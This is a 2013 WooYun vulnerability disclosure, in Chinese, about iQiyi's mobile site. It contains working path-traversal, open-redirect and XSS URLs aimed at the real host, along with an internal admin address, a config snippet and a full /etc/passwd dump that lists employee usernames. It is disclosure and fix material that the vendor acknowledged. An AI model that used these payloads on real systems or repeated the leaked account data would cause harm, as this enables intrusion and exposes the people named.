漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-025442
漏洞标题:百度爱奇艺分站xss url跳转 读取任意文件 下载任意文件 敏感信息泄露 各种漏洞
相关厂商:奇艺
漏洞作者: 单恋一支花
提交时间:2013-06-08 13:29
修复时间:2013-07-23 13:30
公开时间:2013-07-23 13:30
漏洞类型:未授权访问/权限绕过
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-06-08: 细节已通知厂商并且等待厂商处理中
2013-06-10: 厂商已经确认,细节仅向厂商公开
2013-06-20: 细节向核心白帽子及相关领域专家公开
2013-06-30: 细节向普通白帽子公开
2013-07-10: 细节向实习白帽子公开
2013-07-23: 细节向公众公开
简要描述:
百度爱奇艺分站xss url跳转,读取任意文件,下载任意文件,敏感信息泄露,已得到etc/shadow 数据库信息root信息等可钓鱼,花点心思可csrf微博上@爱奇艺,没人理我,只能发乌云了,求礼物,没礼物送妹子也行!!
详细说明:
http://3g.iqiyi.com/wap/pro/forward.jsp?forward_url=http://www.baidu.com跳转 费点劲能csrf吧
http://3g.iqiyi.com//wap/pro/forward.jsp?c=&dirid=index&forward_url=..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2fetc%2fpasswd&linkid=285读取etc/passwd
http://10.10.131.126:8087/wap/cms/index.jsp 通过svn得到的后台地址
<%@ page import= "java.lang.*" %>
<%
String xhost = "10.10.131.126";
String xport = "8087";
String xhost_port = xhost + ":" + xport;
String xrpath = "/data/webroot/wap/";
String xImg = "/wap/images/srcpic/";
String xRImg = "/wap/images/realpic/";
String xImgPath = xrpath + "images/srcpic/";
String xImgRPath = xrpath + "images/realpic/";
String xImgKeyword = xrpath + "cms/keyword.txt";
String xIcon = xrpath + "images/icon/";
String xRIcon = xrpath + "images/logo";
String xVideo = "/wap/video/";
String xVideoPath = xrpath + "video/";
%>
网站配置信息
https://scm.qiyi.domain:18080/svn/mobilerep/server/wapsupport/212_wap/clien svn敏感信息
http://3g.iqiyi.com//wap/cache_admin.jsp?a=3&k=sbhelen<ScRiPt >alert(1);</ScRiPt>&t=wap_busitbl http://3g.iqiyi.com/wap/pro/fdetail.jsp?c=" onmouseover=alert(/sbhelen/) bad="&linkid=285&plt=1&sid=9lwmvnzB08495198ie会提示 自己研究吧
http://3g.iqiyi.com/wap/cms/vte/vte.inc 网站路径泄露
漏洞证明:
etc/passwd
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin nagios:x:500:500::/home/nagios:/bin/bash share:x:501:501::/home/share:/bin/bash yuanyang:x:502:501::/home/yuanyang:/bin/bash songzhongliang:x:503:501::/home/songzhongliang:/bin/bash lixiaopo:x:504:501::/home/lixiaopo:/bin/bash luyongzhao:x:505:501::/home/luyongzhao:/bin/bash mayue:x:506:506::/home/mayue:/bin/bash songzhongliang2:x:507:507::/home/songzhongliang2:/bin/bash
后台
路径
数据库
root信息还是不给了 太敏感了吧
修复方案:
做好过滤,不知道奇艺的尺度是多大,不敢放太多信息!一定要做好安全,svn信息不要忽视,细节问题做好!
版权声明:转载请注明来源 单恋一支花@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-06-10 22:17
厂商回复:
多谢提醒,感谢
最新状态:
暂无